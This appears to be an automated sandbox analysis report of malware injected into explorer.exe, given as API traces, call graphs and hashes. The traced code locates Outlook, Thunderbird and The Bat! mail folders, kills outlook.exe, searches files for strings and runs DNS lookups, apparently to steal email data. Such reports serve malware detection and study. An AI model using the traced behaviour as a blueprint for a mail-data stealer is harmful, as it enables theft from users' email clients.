                                                                                                                                                    APIs
                                                                                                                                                    • CreateStreamOnHGlobal.OLE32 ref: 000622D0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000027.00000002.573648210.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_39_2_61000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateGlobalStream
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2244384528-0
                                                                                                                                                    • Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                                                                                                    • Instruction ID: 6c511f69b69d8d3de49810070f3f7e1f5989998c8ca95c8496505d4ba7d4b445
                                                                                                                                                    • Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                                                                                                    • Instruction Fuzzy Hash: 7AE08C30108B0A8FD798AFBCE4CA07933A1EB9C252B05093EE005CB114D27988C18741

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:15.3%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:96.6%
                                                                                                                                                    Signature Coverage:3.4%
                                                                                                                                                    Total number of Nodes:233
                                                                                                                                                    Total number of Limit Nodes:7
                                                                                                                                                    execution_graph 1119 826ac lstrlen 1120 826f3 1119->1120 1121 826c4 CryptBinaryToStringA 1119->1121 1121->1120 1122 826d7 1121->1122 1125 829b7 GetProcessHeap RtlAllocateHeap 1122->1125 1124 826e2 CryptBinaryToStringA 1124->1120 1125->1124 1126 8295c VirtualFree 898 8126e CreateFileW 899 816fb Sleep 898->899 900 8129e GetFileSize 898->900 901 816f3 CloseHandle 900->901 902 812b6 900->902 901->899 902->901 916 829b7 GetProcessHeap RtlAllocateHeap 902->916 904 812cd 905 812db ReadFile 904->905 906 816f2 904->906 910 812fe 905->910 906->901 907 816eb 917 82999 907->917 908 81329 SetFilePointer 908->907 915 81351 908->915 910->907 910->908 911 81374 RtlMoveMemory 911->915 912 813a3 ReadFile 912->915 913 81c39 26 API calls 913->915 914 81972 29 API calls 914->915 915->907 915->911 915->912 915->913 915->914 916->904 922 827e2 VirtualQuery 917->922 920 829b5 920->906 921 829a5 GetProcessHeap HeapFree 921->920 923 827f9 922->923 923->920 923->921 924 8118f 925 81192 924->925 932 8255c 925->932 928 8255c 16 API calls 929 811b9 928->929 930 8255c 16 API calls 929->930 931 811c6 930->931 947 829b7 GetProcessHeap RtlAllocateHeap 932->947 934 8257a lstrcatW PathAppendW 935 8265d 934->935 936 825a2 FindFirstFileW 934->936 938 82999 3 API calls 935->938 936->935 937 825b9 936->937 939 825bd RtlZeroMemory 937->939 941 8263e FindNextFileW 937->941 942 8260f lstrcatW PathAppendW 937->942 945 825df lstrcatW PathAppendW 937->945 946 8255c 5 API calls 937->946 940 811ac 938->940 939->937 940->928 941->939 944 82652 FindClose 941->944 942->941 943 82627 StrStrIW 942->943 943->937 943->941 944->935 945->937 945->941 946->937 947->934 948 81000 949 81010 948->949 950 81007 948->950 952 81016 950->952 953 827e2 VirtualQuery 952->953 955 8101e 953->955 954 81022 954->949 955->954 960 829b7 GetProcessHeap RtlAllocateHeap 955->960 957 8102e RtlMoveMemory NtUnmapViewOfSection 961 8104f 957->961 960->957 1000 829b7 GetProcessHeap RtlAllocateHeap 961->1000 963 8105c 1001 829b7 GetProcessHeap RtlAllocateHeap 963->1001 965 8106b ExpandEnvironmentStringsW 966 8108c ExpandEnvironmentStringsW 965->966 967 81085 965->967 969 81099 966->969 970 810a0 ExpandEnvironmentStringsW 966->970 1002 8123a 967->1002 971 8123a 24 API calls 969->971 972 810ad 970->972 973 810b4 SHGetSpecialFolderPathW 970->973 971->970 974 8123a 24 API calls 972->974 975 810cc ExpandEnvironmentStringsW 973->975 976 810c5 973->976 974->973 978 810d9 975->978 979 810e0 ExpandEnvironmentStringsW 975->979 977 8123a 24 API calls 976->977 977->975 1009 811cc 978->1009 981 810ed 979->981 982 810f4 ExpandEnvironmentStringsW 979->982 1024 81192 981->1024 984 81108 ExpandEnvironmentStringsW 982->984 985 81101 982->985 987 8111c ExpandEnvironmentStringsW 984->987 988 81115 984->988 986 81192 16 API calls 985->986 986->984 990 81129 987->990 991 81130 987->991 989 81192 16 API calls 988->989 989->987 993 81192 16 API calls 990->993 992 82999 3 API calls 991->992 994 81137 992->994 993->991 995 81187 ExitProcess 994->995 1031 829b7 GetProcessHeap RtlAllocateHeap 994->1031 997 8114e 998 8117f 997->998 999 81158 wsprintfA 997->999 998->995 999->998 999->999 1000->963 1001->965 1032 8274a CreateToolhelp32Snapshot 1002->1032 1005 8255c 16 API calls 1006 8125b 1005->1006 1007 8255c 16 API calls 1006->1007 1008 81268 1007->1008 1008->966 1010 8255c 16 API calls 1009->1010 1011 811e6 1010->1011 1012 8255c 16 API calls 1011->1012 1013 811f3 1012->1013 1014 8255c 16 API calls 1013->1014 1015 81200 1014->1015 1016 8255c 16 API calls 1015->1016 1017 8120d 1016->1017 1018 8255c 16 API calls 1017->1018 1019 8121a 1018->1019 1020 8255c 16 API calls 1019->1020 1021 81227 1020->1021 1022 8255c 16 API calls 1021->1022 1023 81234 1022->1023 1023->979 1025 8255c 16 API calls 1024->1025 1026 811ac 1025->1026 1027 8255c 16 API calls 1026->1027 1028 811b9 1027->1028 1029 8255c 16 API calls 1028->1029 1030 811c6 1029->1030 1030->982 1031->997 1033 81249 1032->1033 1034 82765 Process32First 1032->1034 1033->1005 1035 827ae 1034->1035 1036 8277f lstrcmpi 1035->1036 1037 827b2 CloseHandle 1035->1037 1038 827a0 Process32Next 1036->1038 1039 82795 1036->1039 1037->1033 1038->1035 1041 827be OpenProcess 1039->1041 1042 827e0 1041->1042 1043 827d0 TerminateProcess CloseHandle 1041->1043 1042->1038 1043->1042 1048 82013 1049 82029 lstrlen 1048->1049 1050 82036 1048->1050 1049->1050 1059 829b7 GetProcessHeap RtlAllocateHeap 1050->1059 1052 8203e lstrcat 1053 8207a 1052->1053 1054 82073 lstrcat 1052->1054 1060 820a7 1053->1060 1054->1053 1057 82999 3 API calls 1058 8209d 1057->1058 1059->1052 1094 82415 1060->1094 1064 820d4 1099 82938 lstrlen MultiByteToWideChar 1064->1099 1066 820e3 1100 824cc RtlZeroMemory 1066->1100 1069 82135 RtlZeroMemory 1071 8216a 1069->1071 1070 82999 3 API calls 1072 8208a 1070->1072 1073 823f7 1071->1073 1077 82198 1071->1077 1102 8243d 1071->1102 1072->1057 1073->1070 1075 823dd 1075->1073 1076 82999 3 API calls 1075->1076 1076->1073 1077->1075 1111 829b7 GetProcessHeap RtlAllocateHeap 1077->1111 1079 82268 wsprintfW 1080 8228e 1079->1080 1084 822fb 1080->1084 1112 829b7 GetProcessHeap RtlAllocateHeap 1080->1112 1082 822c8 wsprintfW 1082->1084 1083 823ba 1085 82999 3 API calls 1083->1085 1084->1083 1113 829b7 GetProcessHeap RtlAllocateHeap 1084->1113 1087 823ce 1085->1087 1087->1075 1088 82999 3 API calls 1087->1088 1088->1075 1089 82346 1090 823b3 1089->1090 1114 8296b VirtualAlloc 1089->1114 1091 82999 3 API calls 1090->1091 1091->1083 1093 823a0 RtlMoveMemory 1093->1090 1095 820c6 1094->1095 1096 8241f 1094->1096 1098 829b7 GetProcessHeap RtlAllocateHeap 1095->1098 1115 82818 lstrlen lstrlen 1096->1115 1098->1064 1099->1066 1101 820f3 1100->1101 1101->1069 1101->1073 1103 824ab 1102->1103 1105 8244a 1102->1105 1103->1077 1104 8244e DnsQuery_W 1104->1105 1105->1103 1105->1104 1106 8248d DnsFree inet_ntoa 1105->1106 1106->1105 1107 824ad 1106->1107 1117 829b7 GetProcessHeap RtlAllocateHeap 1107->1117 1109 824b7 1118 82938 lstrlen MultiByteToWideChar 1109->1118 1111->1079 1112->1082 1113->1089 1114->1093 1116 82839 1115->1116 1116->1095 1117->1109 1118->1103 1044 89d24 1045 89caf 1044->1045 1046 89f00 VirtualProtect VirtualProtect 1045->1046 1047 89ec9 1045->1047 1046->1047 1047->1047 1127 818f4 CreateFileW 1128 81919 GetFileSize 1127->1128 1129 8196d 1127->1129 1130 81929 1128->1130 1131 81965 CloseHandle 1128->1131 1130->1131 1141 829b7 GetProcessHeap RtlAllocateHeap 1130->1141 1131->1129 1133 81936 ReadFile 1134 8194b 1133->1134 1135 8195d 1133->1135 1142 81c39 1134->1142 1136 82999 3 API calls 1135->1136 1138 81964 1136->1138 1138->1131 1141->1133 1155 829b7 GetProcessHeap RtlAllocateHeap 1142->1155 1144 81c50 RtlMoveMemory 1145 81e36 1144->1145 1149 81c65 1144->1149 1147 81db2 RtlMoveMemory RtlZeroMemory StrStrIA 1148 81deb StrStrIA 1147->1148 1147->1149 1148->1149 1150 81df7 StrStrIA 1148->1150 1149->1145 1151 82999 3 API calls 1149->1151 1156 829b7 GetProcessHeap RtlAllocateHeap 1149->1156 1157 81e44 1149->1157 1150->1149 1152 81e03 StrStrIA 1150->1152 1151->1149 1152->1149 1153 81e0f StrStrIA 1152->1153 1153->1149 1155->1144 1156->1147 1158 81e5b lstrlen CharLowerBuffA 1157->1158 1163 81ec7 1157->1163 1159 81e75 1158->1159 1161 81e9d 1158->1161 1160 81e7f lstrcmpi 1159->1160 1159->1161 1160->1159 1160->1163 1161->1163 1166 81ece StrStrIA 1161->1166 1163->1149 1165 82692 lstrlen RtlMoveMemory 1165->1163 1167 81ef5 RtlMoveMemory RtlMoveMemory StrStrIA 1166->1167 1168 81eb3 1166->1168 1167->1168 1169 81f37 StrStrIA 1167->1169 1168->1163 1168->1165 1169->1168 1170 81f4a StrStrIA 1169->1170 1170->1168 1171 81f5d lstrlen 1170->1171 1171->1168 1172 81f6a 1171->1172 1172->1168 1173 81f9b lstrlen 1172->1173 1173->1168 1173->1172 1174 89cf6 1176 89caf 1174->1176 1175 89ec9 1175->1175 1176->1174 1176->1175 1177 89f00 VirtualProtect VirtualProtect 1176->1177 1177->1175

                                                                                                                                                    Callgraph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    • Opacity -> Relevance
                                                                                                                                                    • Disassembly available
                                                                                                                                                    callgraph 0 Function_00088F09 1 Function_0008170B 2 Function_0008490B 3 Function_0008380C 4 Function_00089B0E 5 Function_0008560F 6 Function_00081000 14 Function_00081016 6->14 7 Function_00082818 8 Function_00081810 9 Function_00084A10 10 Function_00082013 70 Function_00082999 10->70 82 Function_000820A7 10->82 89 Function_000829B7 10->89 11 Function_00082415 11->7 12 Function_00088816 13 Function_00088F16 35 Function_0008104F 14->35 14->89 106 Function_000827E2 14->106 15 Function_00082917 16 Function_00089028 17 Function_0008892B 18 Function_00088E2C 19 Function_0008992D 20 Function_00089420 21 Function_00089823 22 Function_00082723 23 Function_00089D24 24 Function_00082938 25 Function_00081C39 39 Function_00081E44 25->39 25->70 25->89 110 Function_00081FFB 25->110 26 Function_0008123A 32 Function_0008274A 26->32 43 Function_0008255C 26->43 27 Function_0008493B 28 Function_0008243D 28->24 28->89 29 Function_0008373E 30 Function_00089635 31 Function_00088F36 86 Function_000827BE 32->86 33 Function_00088B4C 34 Function_0008374D 35->26 35->70 72 Function_00081192 35->72 35->89 91 Function_000811CC 35->91 36 Function_00088F40 37 Function_00089040 38 Function_00089543 93 Function_00081ECE 39->93 112 Function_000826FC 39->112 40 Function_00088D46 41 Function_00083547 42 Function_0008875C 43->22 43->43 43->70 43->89 44 Function_0008295C 45 Function_0008185C 46 Function_00088A5F 47 Function_00088A50 48 Function_00088D52 49 Function_00088756 50 Function_00089456 51 Function_00089057 52 Function_00089169 53 Function_0008296B 54 Function_0008946E 55 Function_0008126E 55->1 55->8 55->25 55->45 64 Function_00081972 55->64 55->70 55->89 102 Function_000818EA 55->102 56 Function_00088961 57 Function_00088D61 58 Function_00088862 59 Function_00088B62 60 Function_00083565 61 Function_00082866 62 Function_00084A7A 63 Function_0008967E 64->15 64->39 64->70 64->89 64->110 65 Function_00088E77 66 Function_0008118F 66->43 67 Function_00088681 68 Function_00089182 69 Function_00083685 70->106 71 Function_0008949B 72->43 73 Function_000892AB 74 Function_000826AC 74->89 75 Function_000890AD 76 Function_000889AE 77 Function_000838AE 78 Function_000886A0 79 Function_00088EA4 80 Function_000891A5 81 Function_000834A6 82->11 82->24 82->28 82->53 82->61 82->70 82->89 90 Function_000824CC 82->90 83 Function_000838A7 84 Function_000899B8 85 Function_000886BE 87 Function_000887B5 88 Function_000895B7 91->43 92 Function_000888CE 93->110 94 Function_00088FC0 95 Function_000896C2 96 Function_00088DDB 97 Function_000854DC 98 Function_00088ED6 99 Function_000848D6 100 Function_00084CD6 101 Function_000897E8 103 Function_000887EB 104 Function_000836E0 105 Function_000887E1 107 Function_000890E5 108 Function_000894E6 109 Function_00088DF9 111 Function_000896FC 113 Function_00088AFD 114 Function_00088CFE 115 Function_00084AF0 116 Function_000835F2 117 Function_000818F4 117->25 117->64 117->70 117->89 118 Function_000848F4 119 Function_00088CF5 120 Function_00089CF6

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                                                                                                                      • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 00082588
                                                                                                                                                    • PathAppendW.SHLWAPI(00000000,*.*), ref: 00082594
                                                                                                                                                    • FindFirstFileW.KERNELBASE(00000000,?,?,000818F4), ref: 000825A8
                                                                                                                                                    • RtlZeroMemory.NTDLL(00000209,00000209), ref: 000825C3
                                                                                                                                                    • lstrcatW.KERNEL32(00000209,?), ref: 000825E1
                                                                                                                                                    • PathAppendW.SHLWAPI(00000209,?), ref: 000825ED
                                                                                                                                                    • lstrcatW.KERNEL32(00000209,?), ref: 00082611
                                                                                                                                                    • PathAppendW.SHLWAPI(00000209,?), ref: 0008261D
                                                                                                                                                    • StrStrIW.SHLWAPI(00000209,?), ref: 0008262C
                                                                                                                                                    • FindNextFileW.KERNELBASE(00000000,?,?,000818F4), ref: 00082644
                                                                                                                                                    • FindClose.KERNEL32(00000000,?,000818F4), ref: 00082653
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000028.00000002.579604844.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_40_2_81000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AppendFindPathlstrcat$FileHeap$AllocateCloseFirstMemoryNextProcessZero
                                                                                                                                                    • String ID: *.*
                                                                                                                                                    • API String ID: 1648349226-438819550
                                                                                                                                                    • Opcode ID: f244eec9a02c202261c54c00ec9b413ed975cdb29ccbfba86f23e8cd56307f5a
                                                                                                                                                    • Instruction ID: 9ab04f0758e8323f23007aef3f0b497425df495bdb796eec7b4485748527ddf8
                                                                                                                                                    • Opcode Fuzzy Hash: f244eec9a02c202261c54c00ec9b413ed975cdb29ccbfba86f23e8cd56307f5a
                                                                                                                                                    • Instruction Fuzzy Hash: C9217171204315AFE710BF209D589AFBBECFFC5B05F04051DFAD1A2251EB389A168B66

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 178 8274a-82763 CreateToolhelp32Snapshot 179 827b9-827bd 178->179 180 82765-8277d Process32First 178->180 181 827ae-827b0 180->181 182 8277f-82793 lstrcmpi 181->182 183 827b2-827b3 CloseHandle 181->183 184 827a0-827a8 Process32Next 182->184 185 82795-8279b call 827be 182->185 183->179 184->181 185->184
                                                                                                                                                    APIs
                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00082758
                                                                                                                                                    • Process32First.KERNEL32(00000000,?), ref: 00082777
                                                                                                                                                    • lstrcmpi.KERNEL32(?,outlook.exe), ref: 0008278B
                                                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 000827A8
                                                                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 000827B3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000028.00000002.579604844.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_40_2_81000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
                                                                                                                                                    • String ID: outlook.exe
                                                                                                                                                    • API String ID: 868014591-749849299
                                                                                                                                                    • Opcode ID: 5a2c25bce87a4886a15f15d2e2ef7a80a439fc0a196e4a8c78eb7e8f423e4933
                                                                                                                                                    • Instruction ID: 343884579346d2584715dea729d65f949d7c5dc94cdf17a98ebe8d79567dd670
                                                                                                                                                    • Opcode Fuzzy Hash: 5a2c25bce87a4886a15f15d2e2ef7a80a439fc0a196e4a8c78eb7e8f423e4933
                                                                                                                                                    • Instruction Fuzzy Hash: 23F06230505128ABE720BB65DC49BEE77BCBB48B25F400190E9C9A2191EB388B544F95

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 267 81016-81020 call 827e2 270 81022-81023 267->270 271 81024-81049 call 829b7 RtlMoveMemory NtUnmapViewOfSection call 8104f 267->271 275 8104e 271->275
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 000827E2: VirtualQuery.KERNEL32(00000000,00000209,0000001C,00000209,00082664,?,000818F4), ref: 000827EF
                                                                                                                                                    • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 0008103A
                                                                                                                                                    • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00081043
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000028.00000002.579604844.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_40_2_81000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1675517319-0
                                                                                                                                                    • Opcode ID: baec96bfdead2c76f9d40b549b314d090c8656c966da0cfbe969c1d0fccf5cf0
                                                                                                                                                    • Instruction ID: 55d5dd33b2f901c1089b15beaab3eab97d09ece425fd31eaa01e34cb85dd0178
                                                                                                                                                    • Opcode Fuzzy Hash: baec96bfdead2c76f9d40b549b314d090c8656c966da0cfbe969c1d0fccf5cf0
                                                                                                                                                    • Instruction Fuzzy Hash: 23D05E31800260B7EA657774BC1E9CA2A8CBF45730B254251B6E5961D3C9794A818B71

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                                                                                                                      • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 0008107F
                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%LOCALAPPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 00081093
                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\Microsoft\Outlook,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 000810A7
                                                                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000005,00000000), ref: 000810BB
                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Thunderbird,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 000810D3
                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\The Bat!,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 000810E7
                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\The Bat!,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 000810FB
                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\BatMail,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 0008110F
                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\BatMail,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 00081123
                                                                                                                                                    • wsprintfA.USER32 ref: 0008116B
                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00081189
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000028.00000002.579604844.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_40_2_81000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnvironmentExpandStrings$HeapProcess$AllocateExitFolderPathSpecialwsprintf
                                                                                                                                                    • String ID: %ALLUSERSPROFILE%\BatMail$%ALLUSERSPROFILE%\Microsoft\Outlook$%ALLUSERSPROFILE%\The Bat!$%APPDATA%\BatMail$%APPDATA%\Microsoft\Outlook$%APPDATA%\The Bat!$%APPDATA%\Thunderbird$%LOCALAPPDATA%\Microsoft\Outlook$%s,
                                                                                                                                                    • API String ID: 1709485025-1688604020
                                                                                                                                                    • Opcode ID: 72968f9d89e6bc32a17a9400d13fd263b6a4988c16ccb6dcd1446170f9e16262
                                                                                                                                                    • Instruction ID: 4a2ba61a2a61d2de802517fd4c21c0c34be2e32a5e302aa0719222a3359143be
                                                                                                                                                    • Opcode Fuzzy Hash: 72968f9d89e6bc32a17a9400d13fd263b6a4988c16ccb6dcd1446170f9e16262
                                                                                                                                                    • Instruction Fuzzy Hash: 7331937174022566EA5133654C1AFFF198DBF81FD4B050124F6C9DA2C3DE598E0387B6

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 65 8126e-81298 CreateFileW 66 816fb-81708 Sleep 65->66 67 8129e-812b0 GetFileSize 65->67 68 816f3-816fa CloseHandle 67->68 69 812b6-812bc 67->69 68->66 69->68 70 812c2-812d5 call 829b7 69->70 73 812db-812fc ReadFile 70->73 74 816f2 70->74 75 812fe-81301 73->75 76 8130f 73->76 74->68 77 816eb-816ed call 82999 75->77 78 81307-8130d 75->78 79 81315-8131b 76->79 77->74 78->79 80 81329-8134b SetFilePointer 79->80 81 8131d-8131f 79->81 80->77 84 81351-8135d 80->84 81->80 83 81321-81323 81->83 83->77 83->80 85 8136b-81372 84->85 86 8135f-81369 84->86 87 81374-8137f RtlMoveMemory 85->87 88 81381 85->88 86->87 89 81383-81394 87->89 88->89 90 8139d-813a1 89->90 91 81396-8139b 89->91 92 813a3-813db ReadFile 90->92 91->92 93 816db-816e5 92->93 94 813e1-813e9 92->94 93->77 93->84 95 813ef-813f7 94->95 96 81561-81569 94->96 97 816bc-816c9 95->97 98 813fd-81405 95->98 96->97 99 8156f-81577 96->99 97->94 101 816cf-816d7 97->101 98->97 100 8140b-81417 98->100 99->97 102 8157d-81589 99->102 103 81419-8141e 100->103 104 81420-81422 100->104 101->93 105 8158b-81590 102->105 106 81592-81594 102->106 103->104 104->97 107 81428-81441 call 818ea 104->107 105->106 106->97 108 8159a-815b3 call 818ea 106->108 113 816b8 107->113 115 81447-81458 call 8170b 107->115 108->113 114 815b9-815ca call 8170b 108->114 113->97 114->113 120 815d0-815d5 114->120 115->113 121 8145e-81468 115->121 120->113 122 815db-815ed 120->122 121->113 123 8146e-81480 121->123 124 815ff-81601 122->124 125 815ef-815fb call 8185c 122->125 126 81492-81494 123->126 127 81482-8148e call 8185c 123->127 132 81613-81619 124->132 133 81603-8160e call 81810 124->133 125->124 129 814a6-814ac 126->129 130 81496-814a1 call 81810 126->130 127->126 136 8154b-8155c call 81c39 129->136 137 814b2-814b9 129->137 130->129 140 8161f-81626 132->140 141 816a0-816ac call 81c39 132->141 133->132 154 816b1-816b3 call 81972 136->154 143 814bf-814c4 137->143 144 81542-81545 137->144 145 81628-8162d 140->145 146 8169b-8169e 140->146 141->154 150 814ca-814d3 143->150 151 814c6-814c8 143->151 144->113 144->136 152 8162f-81631 145->152 153 81633-8163c 145->153 146->113 146->141 150->113 156 814d9-814de 150->156 151->144 151->150 152->146 152->153 153->113 155 8163e-81643 153->155 154->113 155->113 158 81645-81652 155->158 156->113 159 814e4-814f1 156->159 160 81653-8166c 158->160 161 814f2-8150b 159->161 162 8166e-81671 160->162 163 8168f-81694 160->163 164 8150d-81510 161->164 165 8152e-81533 161->165 162->163 167 81673-8168b call 81c39 call 81972 162->167 163->160 168 81696 163->168 164->165 169 81512-8152a call 81c39 call 81972 164->169 165->161 166 81535-8153d 165->166 166->113 167->163 168->146 169->165
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00081289
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 000812A1
                                                                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 000816F4
                                                                                                                                                      • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                                                                                                                      • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000400,?,00000000), ref: 000812E8
                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0008132D
                                                                                                                                                    • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 00081379
                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 000813B6
                                                                                                                                                      • Part of subcall function 00081C39: RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081C55
                                                                                                                                                      • Part of subcall function 00081972: RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081994
                                                                                                                                                    • Sleep.KERNELBASE(00000064), ref: 000816FD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000028.00000002.579604844.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_40_2_81000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$MemoryMove$HeapRead$AllocateCloseCreateHandlePointerProcessSizeSleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1032042679-0
                                                                                                                                                    • Opcode ID: 61bc2f22d2100cfa5cada242e575fdd2c09bc464b337c3e81574e5df978ef6ef
                                                                                                                                                    • Instruction ID: 75e5417636b9bb59cc4e60b4fe32e97da451ac298a5a535e8d66e3deab824b36
                                                                                                                                                    • Opcode Fuzzy Hash: 61bc2f22d2100cfa5cada242e575fdd2c09bc464b337c3e81574e5df978ef6ef
                                                                                                                                                    • Instruction Fuzzy Hash: 9DD1D2746082119BC764BF2888406FABBEABFC8760F48462DF8D597295E7308D53CB95

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 195 89cf6-89d10 196 89d15 195->196 197 89d16-89d28 196->197 199 89d2a 197->199 200 89d8e-89d8f 197->200 202 89d2c-89d36 199->202 203 89caf-89cbd 199->203 201 89d90-89d95 200->201 204 89d96-89d98 201->204 202->196 207 89d38-89d43 202->207 205 89cbf-89cce 203->205 206 89cd1-89cf4 203->206 208 89d9a-89d9f 204->208 209 89da1 204->209 205->206 206->195 210 89d44-89d4c 207->210 208->209 209->201 211 89da3 209->211 210->210 212 89d4e-89d50 210->212 213 89da8-89daa 211->213 214 89d79-89d88 212->214 215 89d52-89d55 212->215 216 89dac-89db1 213->216 217 89db3-89db7 213->217 214->200 214->208 215->197 218 89d57-89d75 215->218 216->217 217->213 221 89db9 217->221 219 89d7b-89d88 218->219 220 89f3d 218->220 219->208 220->220 222 89dbb-89dc2 221->222 223 89dc4-89dc9 221->223 222->213 222->223 224 89dd8-89dda 223->224 225 89dcb-89dd4 223->225 226 89ddc-89de1 224->226 227 89de3-89de7 224->227 228 89e4a-89e4d 225->228 229 89dd6 225->229 226->227 230 89de9-89dee 227->230 231 89df0-89df2 227->231 232 89e52-89e55 228->232 229->224 230->231 234 89e14-89e23 231->234 235 89df4 231->235 233 89e57-89e59 232->233 233->232 236 89e5b-89e5e 233->236 238 89e34-89e41 234->238 239 89e25-89e2c 234->239 237 89df5-89df7 235->237 236->232 240 89e60-89e7c 236->240 241 89df9-89dfe 237->241 242 89e00-89e04 237->242 238->238 243 89e43-89e45 238->243 239->239 244 89e2e 239->244 240->233 245 89e7e 240->245 241->242 242->237 246 89e06 242->246 243->204 244->204 247 89e84-89e88 245->247 248 89e08-89e0f 246->248 249 89e11 246->249 250 89e8a-89ea0 247->250 251 89ecf-89ed2 247->251 248->237 248->249 249->234 259 89ea1-89ea6 250->259 252 89ed5-89edc 251->252 253 89ede-89ee0 252->253 254 89f00-89f30 